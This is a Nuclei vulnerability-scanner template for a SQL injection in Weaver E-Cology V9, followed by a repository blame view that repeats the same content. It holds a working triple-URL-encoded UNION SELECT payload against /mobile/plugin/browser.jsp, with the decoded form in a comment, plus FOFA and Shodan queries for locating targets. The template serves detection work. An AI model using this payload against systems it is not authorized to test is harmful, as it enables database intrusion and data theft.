nuclei-templates/http/cnvd/2023/CNVD-2023-12632.yaml

id: CNVD-2023-12632

info:
  name: E-Cology V9 - SQL Injection
  author: daffainfo
  severity: high
  description: |
    Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
  reference:
    - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
    - https://blog.csdn.net/qq_50854662/article/details/129992329
  metadata:
    max-request: 1
    verified: "true"
    fofa-query: app="泛微-协同商务系统"
    shodan-query: 'ecology_JSessionid'
  tags: cnvd,cnvd2023,ecology,sqli

# a' union select 1,''+(SELECT md5(9999999))+'
# URL encoded 3 times

http:
  - raw:
      - |
        POST /mobile/plugin/browser.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '283f42764da6dba2522412916b031080'
          - '"autoCount"'
          - '"autoGet"'
        condition: and

      - type: status
        status:
          - 200
feat: added CNVD-2023-12632.yaml 2023-05-22 05:25:07 +00:00			`id: CNVD-2023-12632`

			`info:`
			`name: E-Cology V9 - SQL Injection`
			`author: daffainfo`
			`severity: high`
			`description: \|`
			`Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.`
			`reference:`
			`- https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003`
			`- https://blog.csdn.net/qq_50854662/article/details/129992329`
			`metadata:`
			`max-request: 1`
removing missing header 2023-05-23 05:30:42 +00:00			`verified: "true"`
feat: added CNVD-2023-12632.yaml 2023-05-22 05:25:07 +00:00			`fofa-query: app="泛微-协同商务系统"`
removing missing header 2023-05-23 05:30:42 +00:00			`shodan-query: 'ecology_JSessionid'`
			`tags: cnvd,cnvd2023,ecology,sqli`
feat: added CNVD-2023-12632.yaml 2023-05-22 05:25:07 +00:00
			`# a' union select 1,''+(SELECT md5(9999999))+'`
			`# URL encoded 3 times`

			`http:`
			`- raw:`
			`- \|`
			`POST /mobile/plugin/browser.jsp HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '283f42764da6dba2522412916b031080'`
			`- '"autoCount"'`
			`- '"autoGet"'`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`